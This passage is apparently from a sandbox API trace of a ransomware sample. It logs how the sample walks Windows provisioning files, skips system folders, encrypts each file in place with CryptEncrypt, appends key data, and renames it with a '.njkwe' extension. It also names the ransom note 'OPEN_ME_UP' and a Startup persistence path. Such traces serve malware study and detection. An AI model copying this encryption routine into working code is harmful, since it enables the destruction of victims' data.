(Spain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.080] lstrcmpiW (lpString1="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.080] lstrcmpiW (lpString1="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.080] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml") returned 160 [0079.080] StrStrIW (lpFirst="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.080] lstrcmpW (lpString1="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.080] lstrcmpW (lpString1="402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.080] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\402__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.080] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\402__connections_cellular_movistar (spain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.080] GetTickCount () returned 0x115417a [0079.080] GetTickCount () returned 0x115417a [0079.080] GetTickCount () returned 0x115417a [0079.080] GetTickCount () returned 0x115417a [0079.081] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.081] GetProcessHeap () returned 0xbe0000 [0079.081] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.081] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.082] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.082] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.082] GetProcessHeap () returned 0xbe0000 [0079.082] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.082] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.082] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.083] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.083] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.083] CloseHandle (hObject=0x43c) returned 1 [0079.083] GetProcessHeap () returned 0xbe0000 [0079.083] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.083] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\402__connections_cellular_movistar (spain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\402__Connections_Cellular_Movistar (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\402__connections_cellular_movistar (spain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.084] GetProcessHeap () returned 0xbe0000 [0079.084] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.084] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ecca53, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ecca53, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ecca53, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", cAlternateFileName="403__C~1.PRO")) returned 1 [0079.084] lstrcmpiW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.084] lstrcmpiW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.084] lstrcmpiW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.084] lstrcmpiW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.084] lstrcmpiW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.084] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml") returned 160 [0079.084] StrStrIW (lpFirst="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.084] lstrcmpW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.084] lstrcmpW (lpString1="403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.084] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\403__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\403__connections_cellular_movistar (spain)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.084] GetTickCount () returned 0x115417a [0079.084] GetTickCount () returned 0x115417a [0079.084] GetTickCount () returned 0x115417a [0079.084] GetTickCount () returned 0x115417a [0079.084] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.084] GetProcessHeap () returned 0xbe0000 [0079.084] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.084] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x35a, lpOverlapped=0x0) returned 1 [0079.086] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.086] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x35a, lpOverlapped=0x0) returned 1 [0079.086] GetProcessHeap () returned 0xbe0000 [0079.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.086] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.086] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.086] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.086] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.086] CloseHandle (hObject=0x43c) returned 1 [0079.087] GetProcessHeap () returned 0xbe0000 [0079.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.087] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\403__connections_cellular_movistar (spain)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\403__Connections_Cellular_Movistar (Spain)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\403__connections_cellular_movistar (spain)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.087] GetProcessHeap () returned 0xbe0000 [0079.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.087] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ecca53, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ecca53, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ecca53, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="404__C~1.PRO")) returned 1 [0079.087] lstrcmpiW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0079.087] lstrcmpiW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0079.087] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0079.088] StrStrIW (lpFirst="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0079.088] lstrcmpW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.088] lstrcmpW (lpString1="404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0079.088] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\404__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\404__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.088] GetTickCount () returned 0x115417a [0079.088] GetTickCount () returned 0x115417a [0079.088] GetTickCount () returned 0x115417a [0079.088] GetTickCount () returned 0x115417a [0079.088] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.089] GetProcessHeap () returned 0xbe0000 [0079.089] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.089] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x201, lpOverlapped=0x0) returned 1 [0079.090] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffdff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.090] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x201, lpOverlapped=0x0) returned 1 [0079.090] GetProcessHeap () returned 0xbe0000 [0079.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.090] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.090] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.090] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.091] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.091] CloseHandle (hObject=0x43c) returned 1 [0079.091] GetProcessHeap () returned 0xbe0000 [0079.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.091] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\404__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\404__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\404__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.092] GetProcessHeap () returned 0xbe0000 [0079.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.092] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ecca53, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ecca53, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ecca53, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="405__C~1.PRO")) returned 1 [0079.092] lstrcmpiW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0079.092] lstrcmpiW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0079.092] lstrcmpiW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0079.092] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0079.092] StrStrIW (lpFirst="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0079.092] lstrcmpW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.092] lstrcmpW (lpString1="405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0079.092] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\405__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\405__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.092] GetTickCount () returned 0x115418a [0079.092] GetTickCount () returned 0x115418a [0079.092] GetTickCount () returned 0x115418a [0079.092] GetTickCount () returned 0x115418a [0079.092] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.093] GetProcessHeap () returned 0xbe0000 [0079.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.093] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1dc, lpOverlapped=0x0) returned 1 [0079.106] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.106] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1dc, lpOverlapped=0x0) returned 1 [0079.106] GetProcessHeap () returned 0xbe0000 [0079.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.106] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.106] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.107] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.107] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.107] CloseHandle (hObject=0x43c) returned 1 [0079.107] GetProcessHeap () returned 0xbe0000 [0079.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.107] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0079.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\405__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\405__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\405__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.108] GetProcessHeap () returned 0xbe0000 [0079.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.108] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ecca53, ftCreationTime.dwHighDateTime=0x1d2e96f, 